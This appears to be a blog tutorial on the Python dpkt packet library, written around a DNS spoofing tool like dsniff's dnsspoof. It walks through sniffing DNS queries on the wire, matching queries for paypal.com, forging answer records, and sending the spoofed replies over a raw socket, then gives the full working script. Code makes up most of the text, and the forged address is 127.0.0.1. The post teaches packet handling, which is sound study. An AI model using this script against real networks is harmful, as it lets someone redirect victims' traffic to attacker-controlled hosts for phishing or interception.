Posts | Archive

dpkt Tutorial #3: DNS Spoofing

In our first and second dpkt tutorials, we looked at the simple construction and parsing of packets respectively.  Our third tutorial combines both parsing and construction of packets in a single utility for performing DNS spoofing (a la dsniff's dnsspoof).

dpkt is a sweet framework for creating and parsing packets.  While dpkt doesn't have much documentation, once you get the hang of using one module, the rest fall into place fairly easily.  I'll be doing a number of dpkt tutorials with simple tasks in hopes of providing some "documentation by example".  If you have any tasks you'd like to see done in dpkt, drop me a line.

In this tutorial, we'll use dpkt to parse DNS requests observed on the wire and construct spoofed DNS responses to send back.  We'll also be using the dnet and pypcap libraries in this example.  Since you've certainly read the first two tutorials before this one, we will assume you are familiar with the basic methods of parsing and constructing packets using dpkt.

One of the most common usages of dpkt is to parse packets off the wire, which pypcap makes easy.  We'll start off by setting pypcap's BPF expression to "udp dst port 53" since we only want to look at DNS queries and parse each of the packets handed to us using dpkt:

pc = pcap.pcap()
pc.setfilter('udp dst port 53')

for ts, pkt in pc:
    eth = dpkt.ethernet.Ethernet(pkt)
    ip = eth.data
    udp = ip.data
    dns = dpkt.dns.DNS(udp.data)

Next, we need to perform some validation on the parsed DNS payload since we only want to spoof responses to legitimate DNS queries.  In this next snippet, we ensure that the DNS payload is indeed a query, has a single RR in the question section, has no answer or nameserver RRs, and that the RR in the question section is for an A record and the IN class:

if dns.qr != dpkt.dns.DNS_Q:
    continue
if dns.opcode != dpkt.dns.DNS_QUERY:
    continue
if len(dns.qd) != 1:
    continue
if len(dns.an) != 0:
    continue
if len(dns.ns) != 0:
    continue
if dns.qd[0].cls != dpkt.dns.DNS_IN:
    continue
if dns.qd[0].type != dpkt.dns.DNS_A:
    continue

As seen from the above snippet, the dpkt DNS module parses the various sections of the DNS payload (qd, an, ns, ar) into python lists.  This will come in handy later when constructing our response.  In addition to validating the DNS payload, we only want to spoof responses for particular domains.  In this case, we'll only spoof responses for paypal.com:

if dns.qd[0].name != 'paypal.com':
    continue

Now that we've parsed and decoded the DNS query, we need to construct our spoofed response and send it back to the client.  Instead of constructing a new packet from scratch, we can simply reuse the existing one and modify it appropriately.  We start by setting the attributes of the DNS header indicating that it is a response:

dns.op = dpkt.dns.DNS_RA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
dns.qr = dpkt.dns.DNS_R

Next, we need to create our fake RR that will be included in the answer section of the DNS response.  We do this by creating an object of the type dpkt.dns.DNS.RR and filling in its attributes:

arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = 'paypal.com'
arr.ip = dnet.addr('127.0.0.1').ip

For the purposes of this tutorial, our spoofed answer RR will claim that paypal.com is at 127.0.0.1.  We now need to add this newly created RR to the answer section of the DNS payload.  Since dns.an is a python list, we can simply append the arr object to it:

dns.an.append(arr)

If we print out the dns object, we can see the correct RRs in the question and answer sections:

>>> print dns
DNS(an=[RR(name='paypal.com')], qd=[Q(name='paypal.com')], id=21825, op=32896)

Now that our DNS payload is complete, we must fix up the UDP and IP layers of our original packet.  Since we're reusing the existing packet and want to send the reply back to the client while acting like we're the server, we can just swap the src/dst ports and addresses:

udp.sport, udp.dport = udp.dport, udp.sport
ip.src, ip.dst = ip.dst, ip.src

Next, we need to tack on our new DNS payload.  We do this by assigning the dns object to the udp object's data attribute.  And since we've modified the length of the DNS payload, we need to update the length attributes of the UDP and IP layers appropriately:

udp.data = dns
udp.ulen = len(udp)
ip.len = len(ip)

We can take a look at our full payload containing the IP, UDP, and DNS payloads:

>>> print ip
IP(src='\x8d\xd5\x04\x04', off=16384, dst='\x8d\xd4n\xa3', sum=3577, len=72,
p=17, id=40555, data=UDP(dport=49008, sum=36486, sport=53, ulen=52,
data=DNS(an=[RR(name='paypal.com')], qd=[Q(name='paypal.com')], id=21825, op=32896)))

Finally, we can checksum and send out the payload buffer through our raw socket:

buf = dnet.ip_checksum(str(ip))
sock.send(buf)

That concludes this dpkt tutorial!  When we run the DNS spoofing script and attempt to contact paypal.com, we see that it successfully spoofs the reply:

jonojono@jonojono ~ $ ping paypal.com
PING paypal.com (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.022 ms
...

The full python script for this tutorial follows:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/env python

import dnet, dpkt, pcap

sock = dnet.ip()

pc = pcap.pcap()
pc.setfilter('udp dst port 53')

for ts, pkt in pc:
    # parse the packet
    eth = dpkt.ethernet.Ethernet(pkt)
    ip = eth.data
    udp = ip.data
    dns = dpkt.dns.DNS(udp.data)

    # validate the DNS query
    if dns.qr != dpkt.dns.DNS_Q:
        continue
    if dns.opcode != dpkt.dns.DNS_QUERY:
        continue
    if len(dns.qd) != 1:
        continue
    if len(dns.an) != 0:
        continue
    if len(dns.ns) != 0:
        continue
    if dns.qd[0].cls != dpkt.dns.DNS_IN:
        continue
    if dns.qd[0].type != dpkt.dns.DNS_A:
        continue

    # only spoof for our target name
    if dns.qd[0].name != 'paypal.com':
        continue

    # transform DNS query into response
    dns.op = dpkt.dns.DNS_RA
    dns.rcode = dpkt.dns.DNS_RCODE_NOERR
    dns.qr = dpkt.dns.DNS_R

    # construct our fake answer RR
    arr = dpkt.dns.DNS.RR()
    arr.cls = dpkt.dns.DNS_IN
    arr.type = dpkt.dns.DNS_A
    arr.name = 'paypal.com'
    arr.ip = dnet.addr('127.0.0.1').ip

    dns.an.append(arr)

    # fix up IP and UDP layers
    udp.sport, udp.dport = udp.dport, udp.sport
    ip.src, ip.dst = ip.dst, ip.src
    udp.data = dns
    udp.ulen = len(udp)
    ip.len = len(ip)

    print `ip`

    # send out spoofed response
    buf = dnet.ip_checksum(str(ip))
    sock.send(buf)

Copyright © 2015 - Jon Oberheide <jon at oberheide dot org>.